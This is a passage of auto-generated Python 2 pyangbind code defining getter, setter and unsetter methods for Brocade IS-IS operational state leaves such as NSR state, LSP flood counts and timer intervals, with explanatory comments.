self.__l1_spf_timer = YANGDynClass(base=l1_spf_timer.l1_spf_timer, is_container='container', presence=False, yang_name="l1-spf-timer", rest_name="l1-spf-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-l1-spf-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__log_handler = YANGDynClass(base=log_handler.log_handler, is_container='container', presence=False, yang_name="log-handler", rest_name="log-handler", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-logger', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__pspf6_timer = YANGDynClass(base=pspf6_timer.pspf6_timer, is_container='container', presence=False, yang_name="pspf6-timer", rest_name="pspf6-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'isis-spf-timer-pspf6-timer-1'}}, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='container', is_config=False)
self.__pspf_enabled = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
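# Every private attribute above is a YANGDynClass wrapper: either a
# RestrictedClassType leaf (uint16/uint32 ranges, or the isis-status
# enumeration keyed by u'is-enabled'/u'is-disabled') or a presence-less
# child container, all flagged is_config=False (operational state).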
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
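# The positional-argument branch above implements copy-construction: one
# compatible object may be passed, and each changed pyangbind element is
# copied across through the matching _set_* method. A hedged sketch
# (object names are illustrative):
#
#   clone = router_isis_config(existing)   # copies changed elements only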
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'isis-state', u'router-isis-config']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'isis-state', u'router-isis-config']
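# Both path methods recurse through _parent to build an absolute path; a
# detached instance answers with this node's static location, i.e.
# _path() returns [u'isis-state', u'router-isis-config'].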
def _get_nsr_state(self):
"""
Getter method for nsr_state, mapped from YANG variable /isis_state/router_isis_config/nsr_state (isis-status)
YANG Description: Whether Non-stop Routing (NSR) is enabled
"""
return self.__nsr_state
def _set_nsr_state(self, v, load=False):
"""
Setter method for nsr_state, mapped from YANG variable /isis_state/router_isis_config/nsr_state (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_nsr_state is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_nsr_state() directly.
YANG Description: Whether Non-stop Routing (NSR) is enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """nsr_state must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__nsr_state = t
if hasattr(self, '_set'):
self._set()
def _unset_nsr_state(self):
self.__nsr_state = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="nsr-state", rest_name="nsr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
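# Hedged usage sketch for the isis-status leaves such as nsr_state: only
# the restriction_arg keys are accepted; anything else trips the
# ValueError constructed in the setter.
#
#   obj._set_nsr_state(u'is-enabled')   # accepted
#   obj._set_nsr_state(u'bogus')        # raises ValueError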
def _get_lsp_flood_count(self):
"""
Getter method for lsp_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_flood_count (uint16)
YANG Description: Number of LSPs that can be transmitted in 100 msec
"""
return self.__lsp_flood_count
def _set_lsp_flood_count(self, v, load=False):
"""
Setter method for lsp_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_flood_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_flood_count is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_flood_count() directly.
YANG Description: Number of LSPs that can be transmitted in 100 msec
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_flood_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_flood_count = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_flood_count(self):
self.__lsp_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-flood-count", rest_name="lsp-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
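# Hedged sketch for the uint16 leaves: values outside 0..65535 fail the
# RestrictedClassType range check inside YANGDynClass and surface as the
# ValueError raised above.
#
#   obj._set_lsp_flood_count(4)       # accepted
#   obj._set_lsp_flood_count(70000)   # raises ValueError (out of range)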
def _get_lsp_fast_flood_count(self):
"""
Getter method for lsp_fast_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_fast_flood_count (uint16)
YANG Description: Number of LSPs to be flooded before an SPF run
"""
return self.__lsp_fast_flood_count
def _set_lsp_fast_flood_count(self, v, load=False):
"""
Setter method for lsp_fast_flood_count, mapped from YANG variable /isis_state/router_isis_config/lsp_fast_flood_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_fast_flood_count is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_fast_flood_count() directly.
YANG Description: Number of LSPs to be flooded before an SPF run
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_fast_flood_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_fast_flood_count = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_fast_flood_count(self):
self.__lsp_fast_flood_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-fast-flood-count", rest_name="lsp-fast-flood-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_fast_flood_wait_count(self):
"""
Getter method for fast_flood_wait_count, mapped from YANG variable /isis_state/router_isis_config/fast_flood_wait_count (uint16)
YANG Description: Number of 100 msec iterations IS-IS waits without running SPF so that fast flooding can succeed
"""
return self.__fast_flood_wait_count
def _set_fast_flood_wait_count(self, v, load=False):
"""
Setter method for fast_flood_wait_count, mapped from YANG variable /isis_state/router_isis_config/fast_flood_wait_count (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_fast_flood_wait_count is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_fast_flood_wait_count() directly.
YANG Description: Number of 100 msec iterations IS-IS waits without running SPF so that fast flooding can succeed
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """fast_flood_wait_count must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__fast_flood_wait_count = t
if hasattr(self, '_set'):
self._set()
def _unset_fast_flood_wait_count(self):
self.__fast_flood_wait_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="fast-flood-wait-count", rest_name="fast-flood-wait-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_hello_padding(self):
"""
Getter method for hello_padding, mapped from YANG variable /isis_state/router_isis_config/hello_padding (isis-status)
YANG Description: Whether padding of IS-IS hello PDUs to full MTU is enabled
"""
return self.__hello_padding
def _set_hello_padding(self, v, load=False):
"""
Setter method for hello_padding, mapped from YANG variable /isis_state/router_isis_config/hello_padding (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_hello_padding is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_hello_padding() directly.
YANG Description: Whether padding of IS-IS hello PDUs to full MTU is enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hello_padding must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__hello_padding = t
if hasattr(self, '_set'):
self._set()
def _unset_hello_padding(self):
self.__hello_padding = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding", rest_name="hello-padding", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_hello_padding_ptp(self):
"""
Getter method for hello_padding_ptp, mapped from YANG variable /isis_state/router_isis_config/hello_padding_ptp (isis-status)
YANG Description: Whether padding of IS-IS hello PDUs is enabled on P2P interfaces
"""
return self.__hello_padding_ptp
def _set_hello_padding_ptp(self, v, load=False):
"""
Setter method for hello_padding_ptp, mapped from YANG variable /isis_state/router_isis_config/hello_padding_ptp (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_hello_padding_ptp is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_hello_padding_ptp() directly.
YANG Description: Whether padding of IS-IS hello PDUs is enabled on P2P interfaces
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """hello_padding_ptp must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)""",
})
self.__hello_padding_ptp = t
if hasattr(self, '_set'):
self._set()
def _unset_hello_padding_ptp(self):
self.__hello_padding_ptp = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="hello-padding-ptp", rest_name="hello-padding-ptp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
def _get_csnp_interval(self):
"""
Getter method for csnp_interval, mapped from YANG variable /isis_state/router_isis_config/csnp_interval (uint16)
YANG Description: Rate of transmission of CSNPs
"""
return self.__csnp_interval
def _set_csnp_interval(self, v, load=False):
"""
Setter method for csnp_interval, mapped from YANG variable /isis_state/router_isis_config/csnp_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_csnp_interval is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_csnp_interval() directly.
YANG Description: Rate of transmission of CSNPs
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """csnp_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__csnp_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_csnp_interval(self):
self.__csnp_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="csnp-interval", rest_name="csnp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_gen_interval(self):
"""
Getter method for lsp_gen_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_gen_interval (uint16)
YANG Description: Minimum interval between regenerations of the same LSP
"""
return self.__lsp_gen_interval
def _set_lsp_gen_interval(self, v, load=False):
"""
Setter method for lsp_gen_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_gen_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_gen_interval is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_gen_interval() directly.
YANG Description: Minimum interval between regenerations of the same LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_gen_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_gen_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_gen_interval(self):
self.__lsp_gen_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-gen-interval", rest_name="lsp-gen-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_interval(self):
"""
Getter method for lsp_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_interval (uint32)
YANG Description: Rate of transmission of LSPs
"""
return self.__lsp_interval
def _set_lsp_interval(self, v, load=False):
"""
Setter method for lsp_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_interval (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_interval is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_interval() directly.
YANG Description: Rate of transmission of LSPs
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_interval must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)""",
})
self.__lsp_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_interval(self):
self.__lsp_interval = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-interval", rest_name="lsp-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint32', is_config=False)
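# The uint32 leaves use base_type=long with range 0..4294967295; this is
# Python 2 code (long/unicode), so a binding regenerated for Python 3
# would presumably use int here instead.
#
#   obj._set_lsp_interval(33)      # accepted
#   obj._set_lsp_interval(2**32)   # raises ValueError (out of range)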
def _get_lsp_refresh_interval(self):
"""
Getter method for lsp_refresh_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_refresh_interval (uint16)
YANG Description: LSP refresh interval
"""
return self.__lsp_refresh_interval
def _set_lsp_refresh_interval(self, v, load=False):
"""
Setter method for lsp_refresh_interval, mapped from YANG variable /isis_state/router_isis_config/lsp_refresh_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_refresh_interval is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_refresh_interval() directly.
YANG Description: LSP refresh interval
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_refresh_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_refresh_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_refresh_interval(self):
self.__lsp_refresh_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-refresh-interval", rest_name="lsp-refresh-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_lsp_lifetime(self):
"""
Getter method for lsp_lifetime, mapped from YANG variable /isis_state/router_isis_config/lsp_lifetime (uint16)
YANG Description: Maximum LSP lifetime
"""
return self.__lsp_lifetime
def _set_lsp_lifetime(self, v, load=False):
"""
Setter method for lsp_lifetime, mapped from YANG variable /isis_state/router_isis_config/lsp_lifetime (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_lifetime is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_lsp_lifetime() directly.
YANG Description: Maximum LSP lifetime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_lifetime must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__lsp_lifetime = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_lifetime(self):
self.__lsp_lifetime = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="lsp-lifetime", rest_name="lsp-lifetime", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
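# Each _unset_* method simply rebuilds the YANGDynClass wrapper with no
# value, returning the leaf to its default, unchanged state.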
def _get_retransmit_interval(self):
"""
Getter method for retransmit_interval, mapped from YANG variable /isis_state/router_isis_config/retransmit_interval (uint16)
YANG Description: Time between retransmissions of an LSP
"""
return self.__retransmit_interval
def _set_retransmit_interval(self, v, load=False):
"""
Setter method for retransmit_interval, mapped from YANG variable /isis_state/router_isis_config/retransmit_interval (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit_interval is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_retransmit_interval() directly.
YANG Description: Time between retransmissions of an LSP
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """retransmit_interval must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)""",
})
self.__retransmit_interval = t
if hasattr(self, '_set'):
self._set()
def _unset_retransmit_interval(self):
self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='uint16', is_config=False)
def _get_pspf_enabled(self):
"""
Getter method for pspf_enabled, mapped from YANG variable /isis_state/router_isis_config/pspf_enabled (isis-status)
YANG Description: Whether Partial SPF optimizations are enabled
"""
return self.__pspf_enabled
def _set_pspf_enabled(self, v, load=False):
"""
Setter method for pspf_enabled, mapped from YANG variable /isis_state/router_isis_config/pspf_enabled (isis-status)
If this variable is read-only (config: false) in the
source YANG file, then _set_pspf_enabled is considered a private
method. Backends looking to populate this variable should
do so by calling thisObj._set_pspf_enabled() directly.
YANG Description: Whether Partial SPF optimizations are enabled
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'is-enabled': {'value': 1}, u'is-disabled': {'value': 0}},), is_leaf=True, yang_name="pspf-enabled", rest_name="pspf-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-isis-operational', defining_module='brocade-isis-operational', yang_type='isis-status', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """pspf_enabled must be of a type compatible with isis-status""",
'defined-type': "brocade-isis-operational:isis-status",
